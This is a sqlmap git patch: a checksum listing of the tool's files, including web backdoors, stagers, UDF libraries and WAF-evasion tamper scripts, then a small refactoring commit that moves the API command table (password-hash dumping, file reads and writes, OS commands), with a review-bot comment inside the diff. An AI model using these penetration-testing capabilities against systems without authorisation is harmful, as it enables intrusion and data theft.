-bf7842bb291e2297c3c8d1023eb3e550 plugins/dbms/maxdb/takeover.py -decc645344bb93aca504a71ba2e4cad4 plugins/dbms/mssqlserver/connector.py 
-f1f1541a54faf67440179fa521f99849 plugins/dbms/mssqlserver/enumeration.py -177e1d55d28ed3190bc0079b8126c6be plugins/dbms/mssqlserver/filesystem.py -08914da79141713bd69a25c3cc7f06a8 plugins/dbms/mssqlserver/fingerprint.py -f25c50a95e5390ecd32be5a011637349 plugins/dbms/mssqlserver/__init__.py -612be1929108e7b4512a49a4a3837bbc plugins/dbms/mssqlserver/syntax.py -3c0845fa526e1bb7bbe636fcfcbcc4a6 plugins/dbms/mssqlserver/takeover.py -f6e1f3f09f32b9cb2ca11c016d373423 plugins/dbms/mysql/connector.py -445164daf59b890aeacc968af58fcb53 plugins/dbms/mysql/enumeration.py -4578fa29f04d0a75499f9668466ded07 plugins/dbms/mysql/filesystem.py -fcbf7ff279c527b4aca0dac94c28d20c plugins/dbms/mysql/fingerprint.py -30065993f8300994e4658634121609e9 plugins/dbms/mysql/__init__.py -0e2adbee217f5b94dcc124d24b8dde99 plugins/dbms/mysql/syntax.py -403591e638b6bfdb840d52bd3138ee56 plugins/dbms/mysql/takeover.py -f772070dba85976a7894dac5046b93ea plugins/dbms/oracle/connector.py -e1ffee36fd18f33f34bb4bac4ae43f14 plugins/dbms/oracle/enumeration.py -c326b0d8bed92be67888b0242f565ac8 plugins/dbms/oracle/filesystem.py -538395c0e5ccb1b6befc17f129f45f29 plugins/dbms/oracle/fingerprint.py -9cbce3d3747c67f18e65f9c1eb910b0e plugins/dbms/oracle/__init__.py -5c2f1611c3ceface38a7e95650391ae6 plugins/dbms/oracle/syntax.py -bcdbd9c04d7d5a911e0e31abe1a24f0f plugins/dbms/oracle/takeover.py -f99c23db4ee6a6b8c0edbf684d360ad3 plugins/dbms/postgresql/connector.py -7cdb821884e5f15084d1bea7f8a50574 plugins/dbms/postgresql/enumeration.py -c8bb829d45752b98e6a03817b92e0fe5 plugins/dbms/postgresql/filesystem.py -29560cf78211888802c6e5c8681e7d71 plugins/dbms/postgresql/fingerprint.py -470860d3e85d11a67f2220bffaa415e7 plugins/dbms/postgresql/__init__.py -20e6f48f496348be45f3402ebc265dbb plugins/dbms/postgresql/syntax.py -1287acf330da86a93c8e64aff46e3b65 plugins/dbms/postgresql/takeover.py -80a2083a4fb7809d310c3d5ecc94e3c5 plugins/dbms/sqlite/connector.py -5194556e6b1575b1349f8ccfd773952b plugins/dbms/sqlite/enumeration.py 
-90fa97b84998a01dba7cc8c3329a1223 plugins/dbms/sqlite/filesystem.py -ed52c198f3346ceabdef676e9f5d3c0f plugins/dbms/sqlite/fingerprint.py -f639120d42b33b6ca67930bddbf2ac1f plugins/dbms/sqlite/__init__.py -964e59d2eba619b068b0a15cea28efe0 plugins/dbms/sqlite/syntax.py -3364b2938d7040c507cd622c323557dc plugins/dbms/sqlite/takeover.py -9e64e67291a4c369bad8b8cf2cfa722a plugins/dbms/sybase/connector.py -426698152f63504061e5875e64957691 plugins/dbms/sybase/enumeration.py -74de450dd6d6d006aa9c7eed56e6b09a plugins/dbms/sybase/filesystem.py -c8ee0deaa2309e96d9a409ff1524f3ad plugins/dbms/sybase/fingerprint.py -a3db8618eed5bb2807b6f77605cba9cc plugins/dbms/sybase/__init__.py -36acb9a5966af21b32e8558b0d50653d plugins/dbms/sybase/syntax.py -79f6c7017db4ded8f74a0117188836ff plugins/dbms/sybase/takeover.py -34d181a7086d6dfc7e72ae5f8a4cfe0f plugins/generic/connector.py -e6cd1c5a5244d83396b401f7db43d323 plugins/generic/custom.py -156c227dbe765da3d0fd2976fbe18d8b plugins/generic/databases.py -4e2b366bb9cfdaaed719b219913357c6 plugins/generic/entries.py -d82f2c78c1d4d7c6487e94fd3a68a908 plugins/generic/enumeration.py -0c8abe66a78edca0660bfb8049d109e2 plugins/generic/filesystem.py -f5d5419efddfe04648ea5e953c650793 plugins/generic/fingerprint.py -1e5532ede194ac9c083891c2f02bca93 plugins/generic/__init__.py -f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py -b1d2a7f3170f9b69e71335aa47f9b08b plugins/generic/search.py -a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py -e522c294676ede15bee751107e9bb449 plugins/generic/takeover.py -4419b13a4b78d7e9e4a2632302344a1a plugins/generic/users.py -1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py -5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ -158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ -595f711adf1ecb5f3b9a64532b04d8b9 shell/backdoors/backdoor.jsp_ -09fc3ed6543f4d1885e338b271e5e97a shell/backdoors/backdoor.php_ -ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 
-4e6d2094bd6afe35032fb8bc8a86e83c shell/stagers/stager.aspx_ -0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ -2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ -4eaeef94314956e4517e5310a28d579a sqlmapapi.py -b6e9d67cafb85ff2c3fde165fc577a8d sqlmap.py -1a1e3a78ded58b240c9dbb1b17996acf tamper/0x2char.py -4c3b8a7daa4bff52e01d4168be0eedbe tamper/apostrophemask.py -4115a55b8aba464723d645b7d3156b6e tamper/apostrophenullencode.py -d7e9a979eff4d7315d804a181e66fc93 tamper/appendnullbyte.py -0298d81e9dfac7ff18a5236c0f1d84b6 tamper/base64encode.py -9a3da4aa7b220448aa3ecbb92f68330f tamper/between.py -e1d2329adc6ca89828a2eaec2951806c tamper/bluecoat.py -e3cdf13caedb4682bee3ff8fac103606 tamper/chardoubleencode.py -3b2f68476fbcf8223199e8dd4ec14b64 tamper/charencode.py -b502023ac6c48e49e652ba524b8e18cc tamper/charunicodeencode.py -2c2b38974dc773568de7e7d771d7042c tamper/charunicodeescape.py -6a395de07b60f47d9474ace0a98c160f tamper/commalesslimit.py -211bb8fa36a6ecb42b719c951c362851 tamper/commalessmid.py -6082358eb328d1cdd4587e73c95bbefc tamper/commentbeforeparentheses.py -334e4a2485b3a1bbc1734823b93ea694 tamper/concat2concatws.py -dcdc433fe946f1b9005bcd427a951dd6 tamper/equaltolike.py -06df880df5d8749963f5562f60fd1637 tamper/escapequotes.py -4393cc5220d2e39c5c9c5a9af4e2635d tamper/greatest.py -25ec62158d3e289bda8a04c8b65686ba tamper/halfversionedmorekeywords.py -9d8c350cbb90d4b21ec9c9db184a213a tamper/htmlencode.py -3f79551baf811ff70b2ba8795a2064be tamper/ifnull2casewhenisnull.py -e2c2b6a67546b36983a72f129a817ec0 tamper/ifnull2ifisnull.py -21665e68ef9f91b2395e81d2f341412d tamper/informationschemacomment.py -1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py -2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py -1834b5409c449d2ea1b70a5038fed9eb tamper/lowercase.py -de4c83d33968a0cbf00cdfd8d35deddc tamper/modsecurityversioned.py -39981d5d6cb84aca950458739102bb07 tamper/modsecurityzeroversioned.py -5ee5147612ebe4769a67a8e2305d62f7 tamper/multiplespaces.py 
-be757e4c9a6fb36af7b9a8c444fddb05 tamper/nonrecursivereplacement.py -e298e486c06bb39d81f10d61a5c4ceec tamper/overlongutf8more.py -b9f698556f8333d9fa6eadaab44a77ab tamper/overlongutf8.py -bc0363e4fc04240c9f7b81e4ecce0714 tamper/percentage.py -91272e566ceb4644254cd6abd613db21 tamper/plus2concat.py -265314f4b3b921f4c0d470ddaa6506e4 tamper/plus2fnconcat.py -e94a1c7e4dc7450ac224436269d823bb tamper/randomcase.py -6368a971a80b1acbbbc6b76616bd96b9 tamper/randomcomments.py -48228322d40d97016b05e408c5234634 tamper/securesphere.py -cac8a56f8cc6c14524ee392daa5ae2fd tamper/space2comment.py -62d4d07b640d9d54d26ba33a77de9474 tamper/space2dash.py -ab91c20f71973b1a9a5fecfb9f2a1d1f tamper/space2hash.py -18f827afce8322adfa0c6dfbb4a59379 tamper/space2morecomment.py -59e61a9dd1f1e6b79fde026ed771cac4 tamper/space2morehash.py -ad45e799126d2d563b3958f714d2e7c6 tamper/space2mssqlblank.py -74334d72bffb99b0ac092f87f4da2675 tamper/space2mssqlhash.py -fd1bff6caefe5007444f7a0fabbc8ce9 tamper/space2mysqlblank.py -48a1f013657186e336d249adefbdbc7b tamper/space2mysqldash.py -36958b2a5f5915de8b7cc157a64b267a tamper/space2plus.py -6ce135f89259c379d84c85e538300091 tamper/space2randomblank.py -95c91853034d9e276a6570e4d01b5f74 tamper/sp_password.py -041cb567dff6bb6e7389e12ab3fb84c6 tamper/symboliclogical.py -6459c62914ae643799667de8bd283c97 tamper/unionalltounion.py -3b8182b8caef857b9af397e47d0c9938 tamper/unmagicquotes.py -371afb396f0bb18d97147c5db83354f4 tamper/uppercase.py -557ce5bf5ae9b7ab26f2c6b57312f41a tamper/varnish.py -929a2586dbb7b758a454eb09e13e5a73 tamper/versionedkeywords.py -3aff4d344ebd4f38e033e73b63f84447 tamper/versionedmorekeywords.py -ed1acafbac707bfa71c72f76b81c1bdd tamper/xforwardedfor.py -368165b45dadcdff4422bc010700832a thirdparty/ansistrm/ansistrm.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/ansistrm/__init__.py -8e775c25bc9e84891ad6fcb4f0005c23 thirdparty/beautifulsoup/beautifulsoup.py -cb2e1fe7c404dff41a2ae9132828f532 thirdparty/beautifulsoup/__init__.py 
-ff54a1d98f0ab01ba7b58b068d2ebd26 thirdparty/bottle/bottle.py -4528e6a7bb9341c36c425faf40ef32c3 thirdparty/bottle/__init__.py -b20f539dc45fa9e514c1eb4f5aa8b5c6 thirdparty/chardet/big5freq.py -44159687c2bae35f165b44f07f5f167a thirdparty/chardet/big5prober.py -c80b09e2a63b375c02c8c1e825a953c5 thirdparty/chardet/chardetect.py -d2c4ad8cc905d95f148ead169d249eb8 thirdparty/chardet/chardistribution.py -24c57085435b8ad1a7bf9ff4ffe6cce0 thirdparty/chardet/charsetgroupprober.py -0cb6549c5cf979c8023f8aaf3392a117 thirdparty/chardet/charsetprober.py -241dd3b7d3eb97ae384320fc8346c6ff thirdparty/chardet/codingstatemachine.py -73f2b9ae331ab011571a3b3a2c62acc1 thirdparty/chardet/compat.py -6cccf2eada7dfa841a5c39aaecb037e7 thirdparty/chardet/constants.py -dd0087e46f835b791a5c9904fcda2de3 thirdparty/chardet/cp949prober.py -ecf56c6473c5a9bc0540a1ca11ec998a thirdparty/chardet/escprober.py -00590b3c94c4db8f25639ab261e4c725 thirdparty/chardet/escsm.py -99bc93e45136ecd15d8dfb489059f118 thirdparty/chardet/eucjpprober.py -65b6b3e75845e033ce34c11ccdd85450 thirdparty/chardet/euckrfreq.py -cc2282aef66a161b3451f9cf455fdd7d thirdparty/chardet/euckrprober.py -f13fee8c7bd6db0e8c40030ccacdfbde thirdparty/chardet/euctwfreq.py -ca66f5277872165faa5140068794604a thirdparty/chardet/euctwprober.py -0fb5414fcc0bdb8b04af324015505c06 thirdparty/chardet/gb2312freq.py -84284584b8e29f50f40781205a9d4e76 thirdparty/chardet/gb2312prober.py -354a83d1bb3c20b4626b6c4ad54d163a thirdparty/chardet/hebrewprober.py -d91ddc14e31824faacd96fa88e42a6b8 thirdparty/chardet/__init__.py -03be91b7ead4725af61234d4852bb7ab thirdparty/chardet/jisfreq.py -b59a7b8b0debe197444bf831ba42bbe9 thirdparty/chardet/jpcntx.py -e4e05437410aa80cf9a13afac19997fe thirdparty/chardet/langbulgarianmodel.py -74ce958cbef2eee08a7a04fb4db41260 thirdparty/chardet/langcyrillicmodel.py -7090da7635347b767b4eb194f697207d thirdparty/chardet/langgreekmodel.py -22df1e2996355e4c082cc0b2f8dbe261 thirdparty/chardet/langhebrewmodel.py 
-3b86d62fe73022a609b2e8095edecf87 thirdparty/chardet/langhungarianmodel.py -4f941425be84ee4e1b7ccb7c4b31e8d8 thirdparty/chardet/langthaimodel.py -9e7400a368b70c1acccab78d2cc489cd thirdparty/chardet/latin1prober.py -c27857a02a65a1100f3195f95c50aff9 thirdparty/chardet/mbcharsetprober.py -719ecf479d507a3e6450aefbaa42fcc8 thirdparty/chardet/mbcsgroupprober.py -2fd9f3c93568c552779bd46990027c36 thirdparty/chardet/mbcssm.py -93349a5fa5cb824d1485cd5f3a53928a thirdparty/chardet/sbcharsetprober.py -ee25f2a03587e2c283eab0b36c9e5783 thirdparty/chardet/sbcsgroupprober.py -c9349824f2647962175d321cc0c52134 thirdparty/chardet/sjisprober.py -bcae4c645a737d3f0e7c96a66528ca4a thirdparty/chardet/universaldetector.py -6f8b3e25472c02fb45a75215a175991f thirdparty/chardet/utf8prober.py -3c1b0d627e98643b317244ecfd240bb5 thirdparty/clientform/clientform.py -722281d87fb13ec22555480f8f4c715b thirdparty/clientform/__init__.py -0b625ccefa6b066f79d3cbb3639267e6 thirdparty/colorama/ansi.py -93bb7f06c8300a91b533ea55e8aead43 thirdparty/colorama/ansitowin32.py -ed4d76c08741d34ac79f6488663345f7 thirdparty/colorama/initialise.py -c0707ca77ccb4a2c0f12b4085057193c thirdparty/colorama/__init__.py -ad3d022d4591aee80f7391248d722413 thirdparty/colorama/win32.py -cdd682cbf77137ef4253b77a95ed9bd8 thirdparty/colorama/winterm.py -be7eac2e6cfb45c5e297ec5eee66e747 thirdparty/fcrypt/fcrypt.py -e00542d22ffa8d8ac894c210f38454be thirdparty/fcrypt/__init__.py -2f94ddd6ada38e4091e819568e7c4b7c thirdparty/gprof2dot/gprof2dot.py -855372c870a23d46683f8aa39d75f6a1 thirdparty/gprof2dot/__init__.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/__init__.py -e3b18f925d125bd17c7e7a7ec0b4b85f thirdparty/keepalive/__init__.py -e0c6a936506bffeed53ce106ec15942d thirdparty/keepalive/keepalive.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/magic/__init__.py -bf318e0abbe6b2e1a167a233db7f744f thirdparty/magic/magic.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/multipart/__init__.py -03c8abc17b228e59bcfda1f11a9137e0 
thirdparty/multipart/multipartpost.py -3e502b04f3849afbb7f0e13b5fd2b5c1 thirdparty/odict/__init__.py -127fe54fdb9b13fdac93c8fc9c9cad5e thirdparty/odict/odict.py -08801ea0ba9ae22885275ef65d3ee9dc thirdparty/oset/_abc.py -54a861de0f08bb80c2e8846579ec83bd thirdparty/oset/__init__.py -179f0c584ef3fb39437bdb6e15d9c867 thirdparty/oset/pyoset.py -94a4abc0fdac64ef0661b82aff68d791 thirdparty/prettyprint/__init__.py -ff80a22ee858f5331b0c088efa98b3ff thirdparty/prettyprint/prettyprint.py -5c70f8e5f7353aedc6d8d21d4fb72b37 thirdparty/pydes/__init__.py -a7f735641c5b695f3d6220fe7c91b030 thirdparty/pydes/pyDes.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/socks/__init__.py -afd97f26bffa0532ee4eb4f5f8ec1ab7 thirdparty/socks/socks.py -d41d8cd98f00b204e9800998ecf8427e thirdparty/termcolor/__init__.py -ea649aae139d8551af513769dd913dbf thirdparty/termcolor/termcolor.py -bf55909ad163b58236e44b86e8441b26 thirdparty/wininetpton/__init__.py -a44e7cf30f2189b2fbdb635b310cdc0c thirdparty/wininetpton/win_inet_pton.py -855372c870a23d46683f8aa39d75f6a1 thirdparty/xdot/__init__.py -593473084228b63a12318d812e50f1e2 thirdparty/xdot/xdot.py -08c706478fad0acba049d0e32cbb6411 udf/mysql/linux/32/lib_mysqludf_sys.so_ -1501fa7150239b18acc0f4a9db2ebc0d udf/mysql/linux/64/lib_mysqludf_sys.so_ -70d83edb90c4a20bd95eb62f71c99bd0 udf/mysql/windows/32/lib_mysqludf_sys.dll_ -15aaa93872ca87366065568375ad8eb1 udf/mysql/windows/64/lib_mysqludf_sys.dll_ -0ee1310d4e2a4cc5a7295df01a3a78bf udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_ -c7d9e1fcac5f047edf17d79a825fb64b udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_ -ec41a080f4570c3866b9a7219f7623c4 udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_ -337e2b84dfb089d1ba78323ab2fd21bd udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_ -e3234ad91b65c476e69743b196ea8394 udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_ -2e39682ab7f7f9d6bcce6a3f9dac576b udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_ -b17ade3fe472b00f6d4d655f0d1036b2 
udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_ -3dfc42ea62f5db4196a1b736c603ef0f udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_ -fe297bfe5e27e7f99d64b2d6baa766fe udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_ -d7ce763983f5ef4cdae07480c7e16c36 udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_ -f9e5d7a8f1fbd8df80d07f72ada0251b udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_ -10a20abaf98ff25527702c7e37187427 udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_ -0b5158292758f4a67cb1bdfcefcd4ef3 udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_ -1d8eb0e3d38f1265ea1bef7f9ec60230 udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_ -1222dac08cf53e31e74e350a2c17452f udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_ -27761c5e046da59f1f1e11f6d194e38a udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_ -a6b9c964f7c7d7012f8f434bbd84a041 udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_ -d9006810684baf01ea33281d21522519 udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_ -ca3ab78d6ed53b7f2c07ed2530d47efd udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_ -0d3fe0293573a4453463a0fa5a081de1 udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_ -336d0b0d2be333f5a6184042c85464fd waf/360.py -667cacdcd4ba650c9a436f081a79cd64 waf/airlock.py -7da7970b45512b0233450dbd8088fde0 waf/anquanbao.py -b61329e8f8bdbf5625f9520ec010af1f waf/armor.py -dec64f18c23962d279cc1cde6469afed waf/asm.py -6ea7b4ff5f111acb0b24186ef82c3f2d waf/aws.py -ef722d062564def381b1f96f5faadee3 waf/baidu.py -07bc4b531d2353c9acfbfcada94ff12b waf/barracuda.py -82efee4639f7be75041c0145a6bc8578 waf/bigip.py -6a2834daf767491d3331bd31e946d540 waf/binarysec.py -41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py -2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py -ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py -21b8203fdaaaac3cb7c84fa4dc0627f6 waf/cloudflare.py -b16b1c15532103346d5e2f5b8bd1ed36 waf/cloudfront.py -ac96f34c254951d301973617064eb1b5 waf/comodo.py 
-56d58c982c2cf775e0f8dc6767f336fd waf/datapower.py -1538b661e35843074f4599be93b3fae9 waf/denyall.py -aade02eb8f6a4a214a53db0fd0f2aae6 waf/dosarrest.py -357cbc0a17a44e4f64062b799c718e0b waf/dotdefender.py -7ec3f2a90914b501100685aa66aadf02 waf/edgecast.py -954bebd4a246d8b88794de00ccaecd3b waf/expressionengine.py -a2ce6cde682f78e1fd561dc40611877e waf/fortiweb.py -eb56ac34775cc3c5f721ec967d04b283 waf/generic.py -1c70655551b8296ceeb19292a342e620 waf/hyperguard.py -525483047474e6f15d9898b525bdafd3 waf/incapsula.py -1e5532ede194ac9c083891c2f02bca93 waf/__init__.py -30ae98958fb35061d9a4145cc74c0489 waf/isaserver.py -5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py -898f53c12133da3e946301f4aa97d538 waf/knownsec.py -81e6bf619c7bb73c4b62e2439e60e95a waf/kona.py -b17a154fe7959619eaafffa60e14199f waf/modsecurity.py -d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py -bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py -cb2f1516867684042f580e02138463de waf/netscaler.py -63b3cc819f432a32a403e24a00ab4d23 waf/newdefend.py -a925b2979c8e8aafb9e9a338ba4da6cf waf/nsfocus.py -ad7fe23004f8e0d02534c7baa877add3 waf/paloalto.py -856e34d47fedfe96039a6a7807f9605a waf/profense.py -166eb53544536e3e86223d513b8b688d waf/proventia.py -78a40eca7ddd14c4eaf911de7748b487 waf/radware.py -f5d53758d2008195609557112ce8e895 waf/requestvalidationmode.py -acb82b21f4032ceb510a58142add02ab waf/safe3.py -67cdf508e7b1f69ddf622a87e0e5e4e8 waf/safedog.py -d1b67820442199181815ec3fce27e582 waf/secureiis.py -34f0ec775835744bed601ef7c7a21c9d waf/senginx.py -1508a5200534b5273b66cecfd299e53e waf/sitelock.py -b088cf83c1a681d143e7eaea43f52b80 waf/sonicwall.py -4c412bc70007e6108d109e2911f2cefe waf/sophos.py -0e244e097a648158948dc8bb2351c781 waf/stingray.py -d5a5cef222f0e27f47bec3c4228e255e waf/sucuri.py -46224e3fa4b819da227c50fd45155823 waf/tencent.py -dffa9cebad777308714aaf83b71635b4 waf/teros.py -b37210459a13de40bf07722c4d032c33 waf/trafficshield.py -fe01932df9acea7f6d23f03c6b698646 waf/urlscan.py 
-a687449cd4e45f69e33b13d41e021480 waf/uspses.py -f3a81da13ee098e94edd965ea4b37b04 waf/varnish.py -20840afc269920826deac2b6c00d6b9c waf/wallarm.py -11205abf397ae9072adc3234b656ade9 waf/watchguard.py -9bf34539f382987490d2239d8ef0a651 waf/webappsecure.py -5b1eefdc39d449a74fce0564364b0e09 waf/webknight.py -11a5c6b10ced11e505a74e36ee2503b3 waf/wordfence.py -68e332530fab216d017ede506c3fec2f waf/yundun.py -bea35ba732ccc9548e6c4023cea6832b waf/yunsuo.py -705ac8663513c12150cb5623ef4a04fb waf/zenedge.py -dc394c5b90ada0a5d5853b5ad1f7d56d xml/banner/generic.xml -d8925c034263bf1b83e7d8e1c78eec57 xml/banner/mssql.xml -7b21aeb3ad66d7686eacd23a6346292c xml/banner/mysql.xml -9b262a617b06af56b1267987d694bf6f xml/banner/oracle.xml -c26cd4fa986ddc9f6d92dd87c8fc61cb xml/banner/postgresql.xml -4970709ca31bcaea5eb79547a132606a xml/banner/server.xml -d48c971769c6131e35bd52d2315a8d58 xml/banner/servlet-engine.xml -58be20a3b29a9108d043786907700469 xml/banner/set-cookie.xml -d989813ee377252bca2103cea524c06b xml/banner/sharepoint.xml -350605448f049cd982554123a75f11e1 xml/banner/x-aspnet-version.xml -817078783e1edaa492773d3b34d8eef0 xml/banner/x-powered-by.xml -fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml -0d0d4bd0e06c99dd8eb4f92acc25caf3 xml/errors.xml -a279656ea3fcb85c727249b02f828383 xml/livetests.xml -3318571fac8df058f19ea85780606643 xml/payloads/boolean_blind.xml -b5b8b0aebce810e6cdda1b7106c96427 xml/payloads/error_based.xml -06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml -3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml -c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml -ac649aff0e7db413e4937e446e398736 xml/payloads/union_query.xml -a5eecbca03800851635817e0ca832a92 xml/queries.xml From 4badb546078e320cb224ad86e8682ec208978c5f Mon Sep 17 00:00:00 2001 
From: Miroslav Stampar
Date: Wed, 20 Jun 2018 23:21:55 +0200
Subject: [PATCH 184/428] Couple of small patches

---
 lib/core/dicts.py | 29 +++
 lib/core/enums.py | 28 ---
 lib/core/option.py | 8 +-
 lib/core/settings.py | 2 +-
 lib/utils/api.py | 5 +-
 txt/checksum.md5 | 477 +++++++++++++++++++++++++++++++++++++++++++
 6 files changed, 512 insertions(+), 37 deletions(-)
 create mode 100644 txt/checksum.md5

diff --git a/lib/core/dicts.py b/lib/core/dicts.py
index a457b0262b5..de05a87bd6a 100644
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -5,6 +5,7 @@
 See the file 'LICENSE' for copying permission
 """
 
+from lib.core.enums import CONTENT_TYPE
 from lib.core.enums import DBMS
 from lib.core.enums import OS
 from lib.core.enums import POST_HINT
@@ -294,3 +295,31 @@
     OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
     OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
 }
+
+PART_RUN_CONTENT_TYPES = {
+    "checkDbms": CONTENT_TYPE.TECHNIQUES,
+    "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
+    "getBanner": CONTENT_TYPE.BANNER,
+    "getCurrentUser": CONTENT_TYPE.CURRENT_USER,
+    "getCurrentDb": CONTENT_TYPE.CURRENT_DB,
+    "getHostname": CONTENT_TYPE.HOSTNAME,
+    "isDba": CONTENT_TYPE.IS_DBA,
+    "getUsers": CONTENT_TYPE.USERS,
+    "getPasswordHashes": CONTENT_TYPE.PASSWORDS,
+    "getPrivileges": CONTENT_TYPE.PRIVILEGES,
+    "getRoles": CONTENT_TYPE.ROLES,
+    "getDbs": CONTENT_TYPE.DBS,
+    "getTables": CONTENT_TYPE.TABLES,
+    "getColumns": CONTENT_TYPE.COLUMNS,
+    "getSchema": CONTENT_TYPE.SCHEMA,
+    "getCount": CONTENT_TYPE.COUNT,
+    "dumpTable": CONTENT_TYPE.DUMP_TABLE,
+    "search": CONTENT_TYPE.SEARCH,
+    "sqlQuery": CONTENT_TYPE.SQL_QUERY,
+    "tableExists": CONTENT_TYPE.COMMON_TABLES,
+    "columnExists": CONTENT_TYPE.COMMON_COLUMNS,
+    "readFile": CONTENT_TYPE.FILE_READ,
+    "writeFile": CONTENT_TYPE.FILE_WRITE,
+    "osCmd": CONTENT_TYPE.OS_CMD,
+    "regRead": CONTENT_TYPE.REG_READ
+}
diff --git a/lib/core/enums.py b/lib/core/enums.py
index a1a45007129..96fceee99d9 100644
--- a/lib/core/enums.py
+++ b/lib/core/enums.py
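Review bot: PART_RUN_CONTENT_TYPES lands in lib/core/dicts.py with no comment saying what its keys are, and the original definition in lib/core/enums.py had none either, so the move is a good moment to add one. From the hunk alone the keys read as API command names and the values are CONTENT_TYPE members, and lib/utils/api.py now imports the table from here; a header such as `# maps API sub-command names to the CONTENT_TYPE of the data they produce (consumed by lib/utils/api.py)` above the `PART_RUN_CONTENT_TYPES = {` line would save the next reader a grep. If the relocation exists to keep lib/core/enums.py free of table data, that rationale belongs in the commit message as well.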
@@ -340,34 +340,6 @@ class CONTENT_TYPE:
     OS_CMD = 24
     REG_READ = 25
 
-PART_RUN_CONTENT_TYPES = {
-    "checkDbms": CONTENT_TYPE.TECHNIQUES,
-    "getFingerprint": CONTENT_TYPE.DBMS_FINGERPRINT,
-    "getBanner": CONTENT_TYPE.BANNER,
-    "getCurrentUser": CONTENT_TYPE.CURRENT_USER,
-    "getCurrentDb": CONTENT_TYPE.CURRENT_DB,
-    "getHostname": CONTENT_TYPE.HOSTNAME,
-    "isDba": CONTENT_TYPE.IS_DBA,
-    "getUsers": CONTENT_TYPE.USERS,
-    "getPasswordHashes": CONTENT_TYPE.PASSWORDS,
-    "getPrivileges": CONTENT_TYPE.PRIVILEGES,
-    "getRoles": CONTENT_TYPE.ROLES,
-    "getDbs": CONTENT_TYPE.DBS,
-    "getTables": CONTENT_TYPE.TABLES,
-    "getColumns": CONTENT_TYPE.COLUMNS,
-    "getSchema": CONTENT_TYPE.SCHEMA,
-    "getCount": CONTENT_TYPE.COUNT,
-    "dumpTable": CONTENT_TYPE.DUMP_TABLE,
-    "search": CONTENT_TYPE.SEARCH,
-    "sqlQuery": CONTENT_TYPE.SQL_QUERY,
-    "tableExists": CONTENT_TYPE.COMMON_TABLES,
-    "columnExists": CONTENT_TYPE.COMMON_COLUMNS,
-    "readFile": CONTENT_TYPE.FILE_READ,
-    "writeFile": CONTENT_TYPE.FILE_WRITE,
-    "osCmd": CONTENT_TYPE.OS_CMD,
-    "regRead": CONTENT_TYPE.REG_READ
-}
-
 class CONTENT_STATUS:
     IN_PROGRESS = 0
     COMPLETE = 1
diff --git a/lib/core/option.py b/lib/core/option.py
index f9151e05c00..f0d0ed868f0 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -35,14 +35,11 @@
 from lib.core.common import dataToStdout
 from lib.core.common import getPublicTypeMembers
 from lib.core.common import getSafeExString
-from lib.core.common import extractRegexResult
-from lib.core.common import filterStringValue
 from lib.core.common import findLocalPort
 from lib.core.common import findPageForms
 from lib.core.common import getConsoleWidth
 from lib.core.common import getFileItems
 from lib.core.common import getFileType
-from lib.core.common import getUnicode
 from lib.core.common import normalizePath
 from lib.core.common import ntToPosixSlashes
 from lib.core.common import openFile
@@ -307,7 +304,7 @@ def _setRequestFromFile():
         conf.secondReq = safeExpandUser(conf.secondReq)
 
         if not os.path.isfile(conf.secondReq):
-            errMsg = "specified second-order HTTP request file '%s' " % onf.secondReq
+            errMsg = "specified second-order HTTP request file '%s' " % conf.secondReq
             errMsg += "does not exist"
             raise SqlmapFilePathException(errMsg)
 
@@ -1624,6 +1621,9 @@ def _cleanupOptions():
     if any((conf.proxy, conf.proxyFile, conf.tor)):
         conf.disablePrecon = True
 
+    if conf.dummy:
+        conf.batch = True
+
     threadData = getCurrentThreadData()
